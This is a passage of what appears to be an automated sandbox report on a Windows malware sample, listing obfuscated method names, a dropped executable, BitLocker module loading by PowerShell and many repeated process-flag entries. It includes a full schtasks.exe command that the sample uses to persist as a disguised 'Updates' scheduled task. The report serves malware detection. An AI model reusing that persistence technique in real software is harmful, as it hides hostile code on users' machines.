                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.a800000.8.raw.unpack, bRoPPcSSSFWTtiTNn7a.csHigh entropy of concatenated method names: 'sVAxIiVGxl', 'FFexzJsOD8', 'iuTDTf144A', 'bLiDSkH9U3', 'xFmDG8HCkA', 'kbVDbWw4FP', 'ATiD2VrkiN', 'jlEDwUWQHP', 'OJgDysOR4S', 'nHNDVrO786'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.a800000.8.raw.unpack, n9LNP9YSaR1bInK7Gh.csHigh entropy of concatenated method names: 'EiwWv75M1a', 'HfhWr1TI3N', 'IBXWM9HmCs', 'Wt0WgFdHNp', 'mSZWNOqAP3', 'LkrWqLW6bO', 'Lj0WeDnfTF', 'iYUWjuVh1x', 'BuxWi8h5Ud', 'ruHWRliNEc'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.a800000.8.raw.unpack, YTyQCjgP7RfnjB53fB.csHigh entropy of concatenated method names: 'TkT4oG2upyO7flop0v1', 'QyJQ0w2j4EboRwQWZ7M', 'q4YstAVoq8', 'hhxsZhAApb', 'EWIsxF5ZrL', 'VH8Bup2oryTTJSbQIKq', 'UelCDX2C4alLcXumMEw'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.a800000.8.raw.unpack, TLU8GT44lW7ULMOsp9.csHigh entropy of concatenated method names: 'vFkU3nyyfE', 'J1GUKQlVCI', 'ToString', 'XCkUyN9EUd', 'E5wUVUjJvh', 'uZhUF7EKb8', 'olfUEqx41u', 'SPrUs2w2Pa', 'VI6UfFesVc', 'iTaUHWsNM3'
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeFile created: C:\Users\user\AppData\Roaming\vQzHzddZ.exeJump to dropped file

                Boot Survival

                barindex
                Uses schtasks.exe or at.exe to add and modify task schedules
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vQzHzddZ" /XML "C:\Users\user\AppData\Local\Temp\tmpE4F1.tmp"

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
